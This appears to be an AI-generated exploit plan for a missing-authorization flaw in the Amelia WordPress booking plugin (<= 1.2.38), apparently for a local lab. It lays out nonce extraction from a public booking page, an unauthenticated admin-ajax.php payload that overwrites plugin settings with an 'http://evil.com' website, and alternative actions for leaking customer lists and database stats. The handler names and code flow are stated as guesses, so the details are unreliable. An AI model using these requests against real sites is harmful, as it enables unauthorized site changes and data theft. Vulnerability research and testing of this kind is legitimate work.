Amelia <= 1.2.38 - Missing Authorization

This research plan focuses on exploiting a Missing Authorization vulnerability in the Amelia booking plugin (versions <= 1.2.38). This vulnerability allows unauthenticated attackers to perform administrative actions, such as modifying plugin settings, because the AJAX handlers fail to verify user capabilities.

1. Vulnerability Summary

• Vulnerability: Missing Authorization
• Plugin: Booking for Appointments and Events Calendar – Amelia (ameliabooking)
• Affected Versions: <= 1.2.38
• Patched Version: 2.0
• Description: The plugin registers several AJAX actions via wp_ajax_nopriv_, making them accessible to unauthenticated users. However, the functions triggered by these actions do not perform capability checks (e.g., current_user_can( 'manage_options' )). This allows an attacker to execute sensitive administrative functions, most notably updating the plugin's global settings.

2. Attack Vector Analysis

• Endpoint: /wp-admin/admin-ajax.php
• Action: amelia_update_settings (Inferred based on common "unauthorized action" reports for this version)
• HTTP Method: POST
• Authentication: None (Unauthenticated)
• Preconditions:
  1. The plugin must be active.
  2. A valid WordPress nonce is usually required by the check_ajax_referer call, but since this nonce is exposed on any page containing an Amelia booking form, it is easily obtainable.

3. Code Flow (Inferred)

1. Entry Point: The plugin registers AJAX handlers in a factory or bootstrap class (e.g., AmeliaBooking\Infrastructure\WP\Action\AJAX\AJAXActionFactory).
2. Hook Registration: add_action( 'wp_ajax_nopriv_amelia_update_settings', [ ... ] ) is called, mapping the action to a controller.
3. Controller Execution: The request is routed to AmeliaBooking\Infrastructure\WP\Action\AJAX\Settings\UpdateSettingsAction::handle().
4. Vulnerable Function: Inside handle(), the code likely calls check_ajax_referer( 'amelia_nonce', 'nonce' ) but fails to call current_user_can().
5. Sink: The handle() method extracts the settings parameter from $_POST, decodes it, and passes it to the SettingsService which saves the data to the amelia_settings option in the database.

4. Nonce Acquisition Strategy

Amelia enqueues its settings and nonces on any page where a booking shortcode is present.

1. Identify Shortcode: The primary shortcode is [ameliabooking].
2. Setup Page: Create a public page containing this shortcode.
   • wp post create --post_type=page --post_status=publish --post_title="Booking Page" --post_content='[ameliabooking]'
3. Navigate: Use browser_navigate to visit the newly created page.
4. Extract Nonce: Amelia localizes its data into a global JavaScript object. Use browser_eval to retrieve the nonce:
   • browser_eval("window.wpAmeliaSettings?.nonce")
   • Alternative: If wpAmeliaSettings is not present, check window.ameliaBookingData?.nonce or window.wpAmeliaLabels?.nonce.

5. Exploitation Strategy

We will attempt to modify the plugin's "Company Name" or "Company Website" setting to demonstrate unauthorized data modification.

• HTTP Tool: http_request
• URL: http://localhost:8080/wp-admin/admin-ajax.php
• Method: POST
• Headers: Content-Type: application/x-www-form-urlencoded
• Payload:

  action=amelia_update_settings&nonce=[EXTRACTED_NONCE]&settings={"company":{"name":"Exploited By Research","website":"http://evil.com"}}
  

• Note: The settings parameter must be a JSON-encoded string. You may need to include the full settings object if the plugin doesn't perform a partial merge (fetch current settings first if possible, or just overwrite the specific key).

6. Test Data Setup

1. Install and activate Amelia version 1.2.38.
2. Create a "Booking" page for nonce extraction:

   wp post create --post_type=page --post_status=publish --post_title="Booking" --post_content="[ameliabooking]"
   

3. (Optional) Set an initial company name to verify it changes:

   wp option update amelia_settings '{"company":{"name":"Original Name"}}'
   

7. Expected Results

• HTTP Response: A successful JSON response from the AJAX handler, typically {"success": true} or a JSON object containing the updated settings.
• Status Code: 200 OK.
• Database Change: The amelia_settings option in the wp_options table should reflect the injected values.

8. Verification Steps

1. Check via WP-CLI:

   wp option get amelia_settings --format=json
   

2. Confirm Content: Verify that the company.name field in the JSON output equals "Exploited By Research".

9. Alternative Approaches

If amelia_update_settings is not the vulnerable action or requires a higher-privilege nonce:

1. Try amelia_get_users: Attempt to leak the list of users/customers.
   • action=amelia_get_users&nonce=[NONCE]
2. Try amelia_get_db_stats: Attempt to leak database statistics.
   • action=amelia_get_db_stats&nonce=[NONCE]
3. Check for REST API routes: Amelia also uses /wp-json/ameliabooking/v1/. Check if GET /wp-json/ameliabooking/v1/settings is accessible without a permission_callback.